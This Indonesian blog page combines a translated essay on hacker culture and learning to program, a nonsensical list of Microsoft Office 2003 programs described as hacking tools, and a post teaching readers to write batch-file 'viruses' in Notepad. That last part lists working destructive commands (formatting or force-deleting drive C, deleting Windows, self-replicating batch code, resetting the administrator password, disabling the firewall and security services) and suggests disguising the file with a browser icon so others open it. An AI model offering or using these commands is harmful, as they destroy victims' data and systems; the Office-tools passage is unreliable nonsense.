Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.


Cara Menjadi Seorang Hacker


Pertama Hacker Itu apa?

Kata ‘hacker’, hampir semuanya berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Namun jika ingin /menjadi/ seorang hacker, hanya ada dua definisi yang relevan.

Ada sebuah komunitas, budaya, terdiri dari para programer mahir dan ahli jaringan, yang sejarahnya bermula dari dekade minikomputer pertama yang memiliki time-sharing dan zaman eksperimen awal ARPAnet. Dari anggota budaya inilah muncul istilah ‘hacker’. Hackerlah yang membangun internet. Hackerlah yang membuat sistem operasi Unix menjadi seperti sekarang. Hackerlah yang mengoperasikan Usenet. Hacker yang membuat World Wide Web berjalan. Jika Anda bagian dari budaya ini, jika Anda telah menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.

Cara pikir hacker tidak terbatas pada budaya hacker software. Ada orang yang menerapkan sikap hacker pada banyak bidang lain, elektronik atau musik — bahkan, cara pikir hacker ada di tingkat tertinggi setiap bidang ilmu dan seni. Hacker software mengakui semangat serupa ini dan
kadang menyebut orang-orang tersebut “hacker” pula — sebagian juga berpendapat bahwa sifat seorang hacker tidak bergantung pada wadah tempatnya bekerja. Tapi, untuk selanjutnya, kita akan memusatkan perhatian pada software hacker, keahlian dan sikap mereka, serta tradisi
budaya bersama yang melahirkan istilah ?hacker?.

Terdapat pula sekelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka-mereka ini (terutama terdiri dari remaja pria) mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas,
tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker, sama seperti jika dikatakan bahwa mengontakkan mobil membuat seseorang langsung menjadi ahli mesin. Sayangnya, wartawan dan penulis telah salah kaprah dan menggunakan kata ‘hacker’ untuk melukiskan cracker; sesuatu yang selalu membuat kesal para hacker sejati.

Perbedaan mendasar antara hacker dan cracker: hacker membangun, cracker membongkar. Jika Anda ingin menjadi hacker, lanjutkan membaca. Jika ingin menjadi cracker, kunjungi newsgroup alt.2600 <news:alt.2600> dan bersiaplah menghabiskan lima sampai sepuluh tahun di balik jeruji setelah mengetahui bahwa Anda ternyata tidak sepandai yang Anda kira. Hanya itu
yang perlu dikatakan tentang cracker.

Sikap Hacker

Pekerjaan hacker menyelesaikan masalah dan membangun sesuatu, dan hacker percaya pada kebebasan dan kerjasama sukarela. Agar dapat diterima sebagai seorang hacker, Anda harus berbuat seolah-olah Anda memiliki sikap ini. Dan agar dapat berbuat demikian, sikap ini harus benar-benar diyakini.

Tapi kalau Anda berniat menumbuhkan sikap ini hanya agar dapat diterima di lingkungan hacker, maka Anda belum menangkap maknanya. Menjadi orang yang meyakini sikap hacker penting bagi /Anda sendiri/ — agar bisa terus belajar dan termotivasi. Sama seperti semua seni kreatif lain,
cara paling efektif untuk menjadi seorang ahli adalah dengan meniru cara berpikir ahli-ahli lainnya — bukan hanya secara intelektual tapi juga emosional.

Seperti diungkapkan oleh sebuah sajak Zen modern di bawah:
Untuk mengikuti jalan:
pandanglah sang ahli,
ikuti sang ahli,
berjalan bersama sang ahli,
kenali sang ahili,
jadilah sang ahli.

Jadi, jika ingin menjadi hacker, ulangi pernyataan di bawah ini sampai benar-benar Anda yakini:

Dunia penuh dengan persoalan-persoalan menarik yang menanti
untuk dipecahkan.

Menjadi seorang hacker sebetulnya menyenangkan, tapi ‘menyenangkan’ yang menuntut usaha. Usaha ini membutuhkan motivasi. Atlet yang sukses memperoleh motivasi dari kepuasan fisik saat tubuh mereka beraksi, saat mendorong diri melampaui batasan fisik. Demikian juga, untuk menjadi seorang hacker Anda harus merasa tertarik memecahkan persoalan, mengasah keahlian, dan melatih kecerdasan.

Jika Anda merasa bukan seperti ini secara naluri, Anda harus berusaha menjadi demikian jika ingin berhasil menjadi hacker. Jika tidak, energi hacking Anda akan melemah karena perhatian teralihkan oleh seks, uang, dan kedudukan.

Tidak seharusnya masalah yang sama dipecahkan dua kali.

Otak yang kreatif merupakan sumber daya yang berharga dan terbatas. Tidak seharusnya sumber daya ini diboroskan hanya untuk memikirkan kembali suatu persoalan dari dasar; padahal ada begitu banyak masalah menarik baru lain di dunia ini yang menanti.

Agar dapat bertingkah laku seperti hacker, Anda harus percaya bahwa waktu berpikir hacker lain itu berharga — sebegitu berharganya hingga merupakan suatu kewajiban moral bagi Anda untuk membagikan informasi, menyelesaikan masalah lalu memberi jawabannya pada hacker lain supaya mereka menyelesaikan masalah /baru/ dan tidak selamanya berkutat pada masalah-masalah lama.

Menurut nilai-nilai hacker, jual saja sebagian asal cukup untuk tetap makan, tetap dapat membayar sewa rumah, dan tetap dapat memakai komputer. Tidak melanggar nilai hacker jika Anda memanfaatkan ilmu Anda untuk membiayai keluarga atau bahkan memperkaya
diri, asalkan sambil melakukannya tetap setia pada disiplin ilmu dan sesama hacker lain.

Kebosanan dan pekerjaan membosankan itu jahat.

Hacker (dan manusia kreatif pada umumnya) tidak seharusnya dibosankan dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti mereka tidak melakukan pekerjaan yang hanya bisa dilakukan oleh mereka – menyelesaikan persoalan-persoalan baru. Pemborosan sumber daya ini merugikan semua pihak. Karena itu kebosanan dan pekerjaan membosankan bukan saja tidak menyenangkan tapi juga jahat.

Agar dapat bertingkah laku seperti hacker, Anda harus meyakini hal ini sehingga Anda berkeinginan untuk mengotomasi sebanyak mungkin bagian yang membosankan, bukan saja bagi diri sendiri tapi juga orang lain (terutama sesama hacker).

Hacker kadang melakukan pekerjaan yang di mata orang lain tampaknya berulang-ulang atau membosankan; ini untuk latihan menjernihkan pikiran, atau dalam rangka memperoleh keahlian atau pengalaman yang tak bisa tidak harus diperoleh dengan cara demikian. Tentu saja hal ini dilakukan atas dasar kehendaknya sendiri — setiap orang yang mampu berpikir tidak seharusnya dipaksa menjadi bosan.

Kebebasan itu baik.

Secara alamiah hacker itu anti-otoriter. Siapa pun yang dapat memerintah Anda akan dapat menghentikan Anda untuk menyelesaikan persoalan yang menarik — dan, sesuai pikiran otak para otoriter, pada umumnya akan membuat alasan yang benar-benar bodoh untuk itu. Jadi sikap otoriter harus dilawan di mana pun Anda berada, agar nantinya tidak menekan Anda
dan hacker-hacker lain.

Para otoriter hidup di atas sensor dan kerahasiaan. Mereka tidak percaya pada kerjasama dan berbagi informasi — satu-satunya jenis ‘kerja sama’ yang disukai adalah yang dapat mereka kendalikan. Jadi untuk berlaku seperti seorang hacker, Anda perlu mengembangkan rasa benci pada penyensoran, kerahasiaan, dan penggunaan kekerasan atau penipuan untuk memaksakan kehendak pada orang dewasa. Dan Anda harus bersedia bertindak atas dasar keyakinan ini.

Sikap saja tak ada artinya tanpa keahlian.

Untuk menjadi hacker, Anda perlu mengembangkan sebagian dari sikap-sikap yang telah disebutkan. Tapi memiliki sikap saja belum membuat seseorang menjadi hacker, atau atlet juara atau bintang rock. Untuk menjadi hacker dibutuhkan kecerdasan, latihan, dedikasi, dan kerja keras.

Jadi, Anda perlu belajar untuk tidak mempercayai sikap saja dan menghormati setiap bentuk kemampuan. Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian — terutama keahlian dalam hacking, tapi juga keahlian di bidang apapun. Yang terlebih bagus lagi yaitu keahlian dalam bidang yang sulit dan hanya dapat dikuasai oleh sedikit orang, dan yang terbaik adalah keahlian dalam bidang yang sulit dan melibatkan ketajaman mental, keahlian, serta konsentrasi.

Bila Anda memuja keahlian, Anda akan merasa senang dalam meningkatkan kemampuan diri — kerja keras dan dedikasi akan menjadi semacam permainan yang mengasyikkan ketimbang pekerjaan membosankan. Dan hal ini penting dalam proses menjadi hacker.

Kemampuan Hacking Dasar

Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat tool yang perlu Anda kuasai sebelum orang bahkan bisa berpikir memanggil Anda hacker.

Perangkat tool ini perlahan-lahan memang berubah seiring teknologi yang menciptakan keahlian baru dan membuat keahlian lama tidak berguna. Misalnya, dulu keahlian pemrograman bahasa mesin termasuk, dan kemampuan HTML belum dan hanya baru-baru ini saja. Yang jelas saat ini yang termasuk adalah:

1. Pelajari pemrograman.

Ini tentunya merupakan keahlian hacking yang fundamental. Jika Anda belum pernah belajar bahasa pemrograman mana pun, saya sarankan mulai dengan Python<http://www.python.org/&gt; .Disainnya bersih, terdokumentasi dengan baik, dan cukup mudah bagi pemula. Meski menjadi bahasa pertama, bukan berarti Python hanya mainan; Python amat ampuh dan fleksibel dan
cocok untuk proyek-proyek besar. Saya menulis evaluasi terhadap Python <http://noframes.linuxjournal.com/lj-issues/issue73/3882.html&gt; yang lebih mendetil. Tutorial Python bisa dilihat di situs web Python <http://www.python.org/&gt; (terjemahan Indonesia <http://steven.haryan.to/pytut.id.html&gt;).

Java juga bahasa yang baik untuk belajar pemrograman. Lebih sulit dari Python, tapi menghasilkan kode yang lebih cepat dari Python. Menurut saya Java amat bagus sebagai bahasa kedua.

Perlu diingat bahwa dengan satu dua bahasa pemrograman saja Anda tidak akan mencapai tingkat keahlian seorang hacker, atau bahkan seorang programer — Anda perlu belajar cara memandang pemrograman secara umum, tidak bergantung pada satu bahasa mana pun. Untuk menjadi hacker sejati, Anda perlu mencapai tahap di mana Anda dapat mempelajari bahasa baru dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan apa yang telah Anda ketahui. Hal ini berarti, Anda perlu mempelajari beberapa bahasa yang jauh berbeda satu dengan yang lainnya.

Jika ingin serius dalam pemrograman, pada akhirnya Anda harus belajar C, bahasa inti sistem operasi Unix. C++ terkait erat dengan C; jika tahu yang satu, belajar yang lain tidak akan susah. Namun keduanya bukan bahasa yang cocok untuk dipelajari pertama kali.

Bahasa lain yang juga penting untuk hacker antara lain Perl <http://www.perl.com/&gt; dan LISP <http://snaefell.tamu.edu/~colin/lp/&gt;. Perl patut dipelajari untuk kebutuhan praktis; Perl dipakai secara amat meluas untuk halaman web aktif dan untuk administrasi sistem, jadi
meskipun nantinya Anda tidak akan membuat program dalam Perl, Anda sebaiknya belajar cara membaca Perl. LISP patut dipelajari karena akan memberikan pengalaman ‘membuka pikiran’ jika Anda telah menangkapnya; dengan mempelajari LISP, Anda akan menjadi seorang programer yang lebih baik, meskipun dalam kenyataan Anda akan jarang memakainya.

Paling baik sebetulnya mempelajari semuanya (Python, Java, C/C++, Perl, dan LISP). Selain merupakan bahasa-bahasa terpenting dalam hacking, masing-masing mewakili cara pendekatan pemrograman yang berbeda, dan tiap bahasa akan memberi Anda pelajaran-pelajaran berharga.

Tentu saja, di sini tidak mungkin saya memberi petunjuk lengkap cara memrogram — pemrograman merupakan keahlian yang kompleks. Tapi, satu petunjuk yang saya berikan: buku dan kursus saja tidak akan membuat Anda menjadi seorang programer (banyak, mungkin hampir semua hacker terbaik itu belajar mandiri). Anda akan menjadi programer dengan (a) /membaca
kode/ dan (b) /menulis kode/.

Belajar membuat program adalah seperti belajar menulis dalam bahasa alamiah. Cara terbaik untuk melakukannya dengan membaca tulisan yang dibuat oleh para ahlinya, membuat tulisan sendiri sedikit, membaca lebih banyak lagi, menulis lebih banyak, dan mengulanginya sampai di tulisan Anda mulai terbentuk semacam kekuatan dan kemahiran penggunaan kata seperti di tulisan-tulisan yang semula Anda teladani.

Dahulu sulit mencari kode yang baik untuk dibaca, karena dulu hanya sedikit program-program besar yang terdapat dalam bentuk source untuk bisa dibaca dan diutak-atik hacker-hacker pemula. Sekarang kondisinya jauh berbeda: software open-source, tool pemrograman, dan sistem operasi (semua dibuat oleh hacker) kini banyak terdapat. Dan ini mengantar kita pada poin berikutnya?

2. Cari, pelajari, dan jalankan salah satu versi Unix open-source.

Saya anggap Anda memiliki, atau memperoleh akses ke komputer pribadi (anak-anak sekarang mudah sekali mendapatkan akses ). Kalau ada satu langkah terpenting bagi pemula untuk mendapatkan kemampuan hacker, itu adalah mendapatkan satu salinan sistem operasi Linux atau salah satu Unix BSD, meng-install-nya di komputer sendiri, dan menjalankannya.

(Tidak saya sarankan meng-install Linux sendirian jika Anda pemula. Cari klub komputer atau kelompok pengguna Linux di daerah Anda dan mintalah bantuan; atau hubungi Linux Internet Support Co-Operative <http://www.linpeople.org/&gt;. LISC mengurus channel-channel IRC <http://openprojects.nu/services/irc.html&gt; tempat Anda dapat bertanya). Tentu, di dunia ini ada banyak sistem operasi selain Unix. Tapi sistem-sistem operasi tersebut didistribusikan dalam program jadi (binary) — kodenya tidak bisa Anda baca, sehingga sistem operasi tersebut tidak bisa Anda modifikasi. Belajar hacking di DOS atau Windows atau MacOS adalah bagaikan belajar menari dengan seluruh tubuh digips.

Lagipula Unix-lah sistem operasi Internet. Meski tentu bisa belajar menggunakan internet tanpa mengenal Unix, Anda tak akan mampu menjadi hacker Internet tanpa memahami Unix. Untuk alasan inilah, budaya hacker saat ini cukup cenderung berat ke Unix.

Jadi, buatlah sistem Unix — saya pribadi menyukai Linux tapi tentu saja ada yang lainnya (dan ya, Anda /bisa/ menjalankan Linux dan DOS/Windows di mesin yang sama). Pelajari Unix. Jalankan Unix. Bermain-mainlah dengan Unix. Berhubungan dengan internet melalui Unix. Baca kodenya. Modifikasi. Di Unix Anda akan menjumpai tool pemrograman yang lebih baik (termasuk C, Lisp, Python, dan Perl) ketimbang di sistem operasi Microsoft manapun, Anda akan bersenang-senang, dan Anda akan mendapat pengetahuan lebih dari yang Anda sadari sampai kemudian ketika mengenang kembali Anda telah seorang hacker ahli.
Lebih jauh tentang mempelajari Unix, lihat The Loginataka
<http://www.tuxedo.org/~esr/faqs/loginataka.html&gt;.
Untuk memperoleh Linux, lihat Where can I get Linux
<http://linuxresources.com/apps/ftp.html&gt;.
Bantuan dan resource BSD Unix bisa Anda lihat di http://www.bsd.org
<http://www.bsd.org&gt;.
Saya menulis pengantar dasar Unix dan Internet
<http://www.linuxdoc.org/HOWTO/Unix-and-Internet-Fundamentals-HOWTO/index.html&gt;.

3. Pelajari cara menggunakan World Wide Web dan cara menulis HTML.

Kebanyakan hasil budaya hacker bekerja di belakang layar tanpa diketahui orang banyak, membantu mengoperasikan pabrik, kantor, dan universitas, tanpa ada pengaruh yang jelas pada cara hidup para non-hacker. Web adalah satu kekecualian, bahkan para politisi pun mengakui bahwa barang mainan hacker yang besar dan berkilauan ini telah mengubah dunia. Untuk
satu alasan ini saja (dan juga banyak alasan bagus lainnya) Anda perlu mempelajari cara pengoperasian Web.

Maksudnya lebih dari sekedar cara menggunakan browser (sebab kalau itu siapa pun bisa), tapi mempelajari cara menulis HTML, bahasa markup Web. Bila Anda belum menguasai pemrograman, lewat menulis HTML Anda akan diajari beberapa kebiasaan mental yang akan membantu Anda belajar pemrograman. Jadi, buatlah home page.

Status dalam Budaya Hacker

Seperti halnya dalam kebanyakan budaya lain tanpa ekonomi uang, dunia hacker berjalan di atas reputasi. Anda berusaha menyelesaikan persoalan-persoalan menarik, tapi seberapa menarik persoalan tersebut, dan apakah solusi Anda benar-benar baik, merupakan sesuatu yang umumnya hanya dapat dinilai oleh rekan sejawat atau atasan Anda.

Demikian juga, dalam permainan hacker, Anda menjaga nilai terutama lewat pandangan hacker lain terhadap kemampuan Anda (inilah sebabnya Anda belum benar-benar seorang hacker sampai hacker-hacker lain dengan konsisten menyebut Anda seorang hacker). Kenyataan ini dikaburkan oleh citra hacking sebagai pekerjaan menyendiri; juga oleh tabu budaya hacker
(yang kini perlahan-lahan menghilang namun masih tetap kuat) yang tidak mengakui bahwa ego atau pengesahan dari luar berpengaruh pada motivasi seseorang.

Tegasnya, dunia hacker merupakan apa yang disebut oleh para antropolog sebagai /budaya memberi/. Kedudukan dan reputasi tidak diperoleh dengan menguasai orang lain, atau dengan menjadi seseorang yang cantik, atau dengan memiliki sesuatu yang tidak dimiliki orang lain, tapi dengan memberikan sesuatu. Tepatnya, dengan memberikan waktu Anda, kreativitas, dan hasil dari kemampuan Anda.

Pada dasarnya ada lima hal yang bisa dilakukan agar dihormati oleh hacker:

1. Menulis software open-source.

Yang pertama (yang paling inti dan paling tradisional) adalah menulis program yang dipandang berguna atau mengasyikkan oleh hacker lain, kemudian memberikan source programnya untuk digunakan oleh seluruh budaya hacker.

Para dewa yang dipuja di dunia hacker yaitu mereka yang telah menulis program besar yang berkemampuan tinggi dan dibutuhkan di mana-mana, lalu memberikan program ini cuma-cuma, dan sekarang program itu telah dipakai setiap orang.

2. Membantu menguji dan men-debug software open-source

Yang selanjutnya berjasa adalah mereka yang bertahan menggunakan dan men-debug software open-source. Di dunia yang tak sempurna ini, tanpa terhindarkan kita harus menghabiskan sebagian besar waktu pengembangan software dalam tahap debugging. Karena itu setiap penulis software open-source yang waras akan berpendapat bahwa penguji beta yang baik (yang tahu bagaimana menjelaskan gejala masalah dengan jelas, bagaimana melokalisir masalah, mampu mentolerir bug di rilis cepat, dan bersedia menjalankan beberapa rutin diagnostik sederhana) itu amat sangat berharga. Bahkan satu saja penguji beta sudah mampu membantu menjadikan tahap debugging dari mimpi buruk panjang yang melelahkan menjadi hanya gangguan yang justru menyehatkan.

Bila Anda seorang pemula, cobalah mencari program yang sedang dalam tahap pengembangan, yang menarik bagi Anda, dan jadilah seorang penguji beta yang baik. Dari sini Anda secara alamiah akan meningkat dari membantu menguji program ke membantu memodifikasi program. Anda akan belajar banyak, dan pada gilirannya nanti Anda pun akan memperoleh bantuan dari orang lain saat membutuhkan.

3. Menerbitkan informasi yang bermanfaat.

Yang bagus juga untuk dilakukan yaitu mengumpulkan dan menyaring informasi-informasi menarik dan berguna ke dalam halaman Web atau dokumen seperti FAQ (Frequently Asked Questions — daftar jawaban pertanyaan-pertanyaan yang sering diajukan orang), dan membuat
dokumen-dokumen ini mudah didapat orang.

Pemelihara FAQ teknis yang besar-besar juga mendapatkan hormat hampir seperti para penulis software open-source.

4. Membantu terus berjalannya infrastruktur.

Budaya hacker (dan juga dalam hal ini pengembangan rekayasa Internet) dijalankan oleh relawan. Banyak sekali pekerjaan yang dibutuhkan namun bukan pekerjaan yang agung, yang harus dilakukan agar semuanya tetap berjalan ? melakukan administrasi mailing list, moderasi newsgroup, memelihara situs archive software yang besar, mengembangkan dokumen-dokumen RFC serta standar teknis lainnya.

Mereka yang melakukan hal-hal seperti dengan baik juga dihormati, karena orang tahu bahwa pekerjaan seperti ini menghabiskan banyak waktu dan kalah mengasyikkan dibanding bermain dengan kode. Melakukan pekerjaan seperti ini menunjukkan bahwa seseorang memiliki dedikasi.

5. Mengabdi kepada budaya hacker itu sendiri.

Terakhir, Anda dapat mengabdi dan menyebarluaskan budaya hacker (lewat, misalnya, menulis panduan tepat bagi pemula tentang cara menjadi seorang hacker ). Anda tidak bisa melakukan hal ini kecuali telah berkecimpung cukup lama dan menjadi figur yang cukup terkenal di salah satu dari empat hal sebelumnya.

Budaya hacker tidak persis memiliki pemimpin, tapi memiliki pahlawan, tetua suku, sejarawan, dan para jubir. Jika Anda telah cukup lama berada di ‘medan tempur’, Anda dapat saja memperoleh salah satu dari jabatan-jabatan ini. Peringatan: hacker tidak mempercayai ego tetua suku yang terlampau mencolok, jadi berbahaya jika Anda terlalu terlihat untuk berusaha menjadi terkenal. Cara yang benar seharusnya yaitu dengan memposisikan diri sedemikian rupa sehingga jabatan tersebut jelas telah Anda capai, lalu kemudian bersikap rendah hati dan ramah sehubungan dengan kedudukan Anda tersebut.

Hubungan Hacker/Orang Nyentrik-Nyentrik

Bertentangan dengan mitos populer, tidak perlu menjadi orang nyentrik untuk menjadi hacker. Meski itu sebetulnya membantu, dan pada kenyataannya banyak hacker yang merupakan orang nyentrik. Menjadi orang yang tersisih secara sosial membantu Anda tetap memusatkan perhatian
pada hal-hal yang benar-benar penting, seperti berpikir dan hacking.

Karena alasan ini, banyak hacker mengadopsi label ‘nerd’ dan bahkan menggunakan istilah yang lebih kasar ‘geek’ sebagai lencana kebanggaan – cara memproklamasikan kebebasan dari tuntutan sosial. Lihatlah The Geek Page <http://samsara.circus.com/~omni/geek.html&gt; untuk pembahasan menyeluruh.

Bila Anda tetap dapat memusatkan perhatian pada hacking sampai menjadi cukup ahli dan tetap memiliki kegiatan sosial, itu sah-sah saja. Hal ini memang lebih mudah dilakukan sekarang ketimbang waktu saya seorang pemula di tahun 1970-an; budaya mainstream saat ini jauh lebih ramah pada para techno-nerd. Malah kini semakin banyak orang yang menyadari
bahwa hacker kadang merupakan kekasih yang berkualitas dan calon pasangan hidup potensial. Lebih lanjut tentang hal ini, lihat Girl’s Guide to Geek Guys <http://www.bunnyhop.com/BH5/geekguys.html&gt;.

Bila ketertarikan Anda pada hacking adalah karena Anda tidak mempunyai kegiatan lain, itu juga tidak apa-apa — setidaknya tidak perlu susah-susah memusatkan perhatian. Mudah-mudahan satu hari nanti Anda akan memperoleh kehidupan sosial.

Panduan Gaya

Saya ulangi, untuk menjadi hacker, Anda perlu memasuki cara pikir hacker. Hal-hal tertentu yang Anda lakukan saat jauh dari komputer kadang membantu mencapainya. Tentu saja kegiatan-kegiatan ini bukan sebagai pengganti hacking (tak ada yang dapat menggantikan hacking) tapi banyak hacker melakukannya, dan merasa bahwa kegiatan tersebut secara dasar berhubungan dengan intisari hacking.

* Membaca karya fiksi ilmiah. Datang ke pertemuan fiksi ilmiah (salah satu jalan yang bagus untuk bertemu hacker dan proto-hacker).

* Mempelajari Zen, dan/atau berlatih bela diri. (Disiplin mental yang diajarkan serupa dengan hacking dalam hal-hal penting.)

* Mengasah pendengaran musik. Belajar menghargai jenis-jenis musik yang tidak lazim. Belajar menjadi ahli dalam bermain alat musik tertentu, atau berlatih bernyanyi.

* Mengembangkan apresiasi akan permainan kata.

* Belajar menulis dalam bahasa asli (Sejumlah banyak hacker, termasuk semua hacker terbaik yang saya kenal, adalah penulis yang cakap).

Semakin banyak dari hal-hal di atas yang sudah Anda kerjakan, semakin besar kemungkinan Anda adalah calon hacker berbakat. Kenapa hal-hal di atas yang berhubungan dengan hacking tidak sepenuhnya jelas, tapi semuanya berkaitan dengan gabungan kemampuan otak kiri dan kanan yang penting (hacker harus dapat berpikir logis dan juga sewaktu-waktu harus dapat melangkah keluar dari logika umum suatu permasalahan).

Terakhir, sebagian dari hal-hal yang /tidak/ sebaiknya dilakukan:

* Jangan menggunakan ID atau nama samaran yang konyol atau berlebihan.
* Jangan terlibat perang flame di Usenet (atau di mana pun).
* Jangan menggelari diri ‘cyberpunk’, jangan berurusan dengan para ‘cyberpunk’.
* Jangan mengirim posting atau email yang penuh salah ketik dan bertata bahasa buruk.

Satu-satunya reputasi yang akan Anda dapatkan jika melakukan hal-hal di atas adalah sebagai orang dungu. Ingatan hacker biasanya bagus – mungkin dibutuhkan bertahun-tahun lamanya sebelum Anda dapat diterima kembali.


Untuk menjadi HACKER profesional dibutuhkan beberapa software pendukung dan keahlian. Untuk itulah akan memberitahukan software- software standar apa saja yang dibutuhkan.....


Microsoft Office Word 2003 untuk mengetik dan menyimpan data- data yang nantinya akan digunakan dalam membantu Anda meng-HACKING


Microsoft Office Excel 2003 untuk membuat data- data berupa tabel yang mempermudah Anda melacak kode- kode yang sulit dilacak (hanya HACKER yang dapat melacaknya).


Microsoft Office Visio 2003 untuk mempermudah Anda (HACKER) dalam merancang modul peng-HACKING-an data.


Microsoft Office Publisher 2003 untuk membantu Anda (HACKER) dalam mem-publish-kan data- data yang telah di-HACK.


Microsoft Office PowerPoint 2003 untuk membuat slide mengenai data- data yang akan dan telah Anda HACK.


Microsoft Office FrontPage 2003 untuk membantu Anda agar sistem peng-HACKING-an menjadi lebih mudah.
Nah itulah tadi Level-Level Dalam Dunia Hacker,semoga bermanfaat dan menambah wawasan sobat…..

Belajar hack memakai notepad

Belajar hack memakai notepad


ehm ehm,karena kemarin saya tidak ada memposting karena ada suatu masalah,jadi kali ini saya mau memposting suatu pembelajaran untuk orang orang jahil yang seperti saya,

sebenarnya cara ini sama dengan cara membuat virus komputer,karena ini adalah salah satu virus komputer yang di buat memakai notepad,,,
dan virus ini tidak begitu berbahaya,karena virus ini bisa langsung di hapus tanpa memakai antivirus,,kalu teman tidak tau membuka notepad,caranya teman klik saja START lalu pilih notepad,,
ingat !!
saya tidak menyuruh teman teman untuk mempraktekkan cara hacking ini kekomputer teman masing masing ya,,
sebaiknya teman praktekkan saja di warnet,atau di labor komputer sekolah dulu..
baiklah,langsung saja kita mulai ya..

virus ini di buat di notepad dan bertipe atau berextension .Bat
dan jangan lupa mengubah save as typenya menjadi All files


BASIC

invisible command/menghilangkan commandpromt

@echo off

Swap mouse/menukar nukar mouse

rundll32 user,swapmousebutton

buka URL yang diinginkan

start [url]http://www.google.com[/url]

shutdown komputer dan berisi pesan

shutdown -s -t 10 -c "UCAPKAN SELAMAT TINGGAL KEPADA KOMPUTERMU" -f

Disable/melumpuhkan mouse setelah restart

rundll32 mouse,disable

Disable/melumpuhkan keyboard setelah restart

rundll32 keyboard,disable

Freezes komputer setelah restart

rundll32 user,disableoemlayer

VIRUS WORM
yang satu ini membasminya butuh bantuan antivirus..

memperbanyak diri dalam direktori

ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"

me-replace/mengganti file batch yang lain

%0 >>other.bat


VIRUS TROJAN
dan yang ini juga butuh bantuan antivirus untuk menghapusnya..

mengirim daftar file kedalam direktori

dir *.*>>Filelist.txt

mengganti password administrasi

net user administrator PASSWORD HERE

membuat info IP

ipconfig >Computer-IP-address.txt

VIRUS PERUSAK

copy ke Autorun

COPY %0 %windir%WINSTART.BAT

Format Drive C

format c: /q /autotest

Delete Windows

DELTREE /Y %windir%

Menghapus Drive C dengan Paksa

DEL /F /S /Q C:

Mematikan Firewall dan security Center

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0

PAUSE

Pause sampai tekan sembarang tombol

pause

Pause 20 detik

@ping.exe 127.0.0.1 -n 20 -w 1000 > nul


itu lah macam macam virus untuk menjahili orang,...
agar teman berhasil dalam rencana jahilnya,teman ganti saja icon .Bat nya menjadi icon icon yang sering di buka oleh orang orang seperti mozilla.internet explorer,google chrome,lalu teman taruh deh ke dekstop..
jangan sembarangan memakainya ya,gunakan saja seperlu jahilnya saja..:)